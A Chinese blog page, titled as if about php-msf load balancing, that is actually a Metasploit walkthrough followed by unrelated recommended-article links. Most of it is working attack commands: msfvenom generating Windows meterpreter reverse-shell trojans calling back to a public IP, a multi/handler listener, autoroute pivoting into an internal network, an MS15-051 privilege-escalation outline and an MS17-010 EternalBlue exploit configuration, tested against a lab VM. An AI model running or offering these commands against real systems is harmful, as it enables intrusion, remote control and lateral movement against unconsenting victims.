php-msf 负载均衡,Metasploit常用操作命令

最新推荐文章于 2024-05-30 14:18:45 发布
最新推荐文章于 2024-05-30 14:18:45 发布
阅读量210 收藏
点赞数
文章标签: php-msf 负载均衡

258df5e0f9c76ad3c3f60c792e902639.png

0x00 简述

0x01基本操作

1.启动MSF

这里用的是kali里面的msf,需要开启msf依赖的数据库为PostgreSQL:

service postgresql start# 启动 postgresql数据库

msfconsole# 启动msf

e9fb68253eb4d6ce943d1a8661dc17ee.png

这样就算是启动成功了,左下角会变成msf >。

2.配置和生成木马

在kali下用ifconfig查询当前攻击机的ip,用于生成木马和配置监听。

ifconfig# 查ip

ad05a492f4a0323477e91660782f1c6e.png

当前ip为192.168.184.129。

首先使用msf生成exe木马命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=监听端口 -f exe /位置/test.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.184.129 LPORT=5555 -f exe -o /var/test.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=45.77.249.160 LPORT=6666 -f exe -i 50 -o c:/xx.exe

这里监听5555端口,配置生成木马。监听面板配置命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 45.77.249.160

set LPORT 6666

exploit

这里开始监听,当木马被运行时,这里会接收到并返回一个meterpreter。

83c5d5d97084d43c8ea83db4e2db8043.png

3.上线

里我用Windows2008R2虚拟机测试了下上线。

9083166638928f331a5cf8b527a8349d.png

成功。

执行列目录ls:

b7a2212d34a0fcba66ffaa190d5b2518.png

执行shell操作命令行:

48231cff87130001239ae6c386934d24.png

回到meterpreter,这里可以继续探测内网。

getuid# 查看当前用户

可以通过获取网段增加路由的方式对内网环境的其他主机继续探测。

run get_local_subnets# 获取网段

run autoroute -s 192.168.184.0 -n 255.255.255.0

# 增加路由

run autoroute -p# 查看路由设置

98d13e8713fa997b4818fba55646fd0d.png

b28bb6c46a330153979ab3a50f979830.png

62253f6d7dc81923cc28872c9c8f3c26.png

0x02 使用MSF提权

这里对Windows2008R2虚拟机提权。

1.查找exp

首先需要查找EXP。使用serach命令。

search MS15-051# 这里直接使用MS15-051

2.利用

这里msf search一直查不到东西。

但是具体流程是选用MS15-051进行提权,再打开一个msf进行监听。查看权限即提权成功。

exploit/windows/local/xxx

set session 10

exploit

0x03 利用MS17010

1.配置exp

目标机IP:192.168.184.131

系统:windows 2008 R2

use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.184.131

set LHOST 45.77.249.160

set LPORT 6666

show options

exploit

2.利用

92b8c9897178cdcdff0a7ef13a136dc3.png

配置完目标机直接执行命令exploit。

5cabe7d2082d15d7c1715a12c2cb4ea7.png

成功的话会提示win并且返回一个meterpreter。

成功。

8735113dee5434ae13b76628210fd5e9.png

喜欢 (4)or分享 (0)

Theellyence
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 675
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 606
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
kali-metasploit的使用
liangjiao_shou的博客
05-25 804
kali nmap 暴力破解 hydra dos ddos 防御 死亡之蓝验证 永恒之蓝验证 漏洞平台 Metasploit linux爆破 后门植入 渗透测试
msf攻击windows实例
qq_52712762的博客
05-30 1549
环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msfmsfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)
小迪安全-04
qq_54190167的博客
03-06 1180
系统数据库以及永恒之蓝、Mysql身份认证绕过漏洞简单复现
学习笔记-权限维持
人饭子的博客
10-30 631
权限维持 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 web webshell webshell 管理工具 webshell 爆破 无字母数字 webshell 无文件 webshell 中间件 win 后门用户 MSF权限维持 权限维持技巧 痕迹清理 域 AD持久化 组策略 Hook_Passw...
破壳笔记-渗透测试
weixin_30561177的博客
07-16 1279
A.介绍 1、根据渗透方法分类 1、黑箱测试 黑箱测试又被称为所谓的“Zero-Knowledge Testing”,渗透者完全处于对系统一无所知的状态,通常这类型测试,最初的信息获取来自于DNS、Web、Email及各种公开对外的服务器。 2、白盒测试 白盒测试与黑箱测试恰恰相反,测试者可以通过正常渠道向被测单位取得各种资料,包括网络拓扑、员工资料甚至网站或其它程序的代码片断,也能够与...
黑客养成计划-一些必学技巧
2401_84208172的博客
04-30 559
几十年前刚有小型电脑的时候,产生了一个由程序专家和部分网络名人所组成的文化社群。该社群的成员创造出了hacker这个词,也就是人们常说的“黑客”。这些黑客们建立了后来的Internet,以及发明了电脑的操作系统。如果有人对这种文化做出了贡献,并且得到了社群的认可,其他成员就会尊称其为“黑客”,带有一种同道中人的意味。事实上有些人在网络上进行着四处破坏的活动,并自称为黑客,然而这些人并不算黑客,充其量就是“骇客”而已,其实真正的黑客一直以建设为己任。那么,做为一名编程小白,应该怎么学起呢?
web安全-网络信息收集2
Coisini的博客
05-31 753
网络信息收集2 dns信息收集 格式:dns… -参数 域名 -参数 示例: root@xxSec:~# dnsenum baidu.com root@xxSec:~# dnsenum -f dns.txt dnsserver 8.8.8.8 baidu.com(-f加字典暴力破解 通过代理服务器) root@xxSec:~# dnswalk baidu.com.(检测有问题的dns,域名后面要加...
渗透流程--信息收集篇
m0_55563900的博客
03-27 2366
收集对象 :http://www.dotahacker.com/ 一、whois信息收集 1、站长之家whois查询:http://whois.chinaz.com/ 2、爱站网whois查询:https://whois.aizhan.com/ 3、万网whois查询:https://wanwang.aliyun.com/?utm_content=se_1006856273 4、网址:https://www.iana.org/whois 5、站点法人信息查询 (1)法人姓名查询和官方 企查查 查到
node-msfrpc:Metasploit Framework RPC API和命令行界面
05-10
适用于Node.js的Metasploit RPC API入门正在安装这将在您的系统中安装cli。 npm install -g msfrpc 这会将msfrpc模块添加到您的Node.js项目中。 npm install --save msfrpc使用cli msfrpc < URI> URI示例: ...
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual,PHP微服务框架即,是Camera360社区服务器端团队基于Swoole自主研发的现代化PHP服务框架,简称msf或者php-msf,它的核心设计思想是采用...
php-msf-demo
04-29
下载项目git clone https://github.com/pinguo/php-msf-demo.git# Step2. 安装docker镜像构建开发环境.进入项目目录sh build.sh# Step3. 参考Step2输出的信息,使用ssh或者exec进入容器, 到达项目根目录, 安装依赖...
笔记222222222222222222222222222222
最新发布
08-04
笔记222222222222222222222222222222
仿拉钩App小程序.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
华云智慧园区.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
新浪读书.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值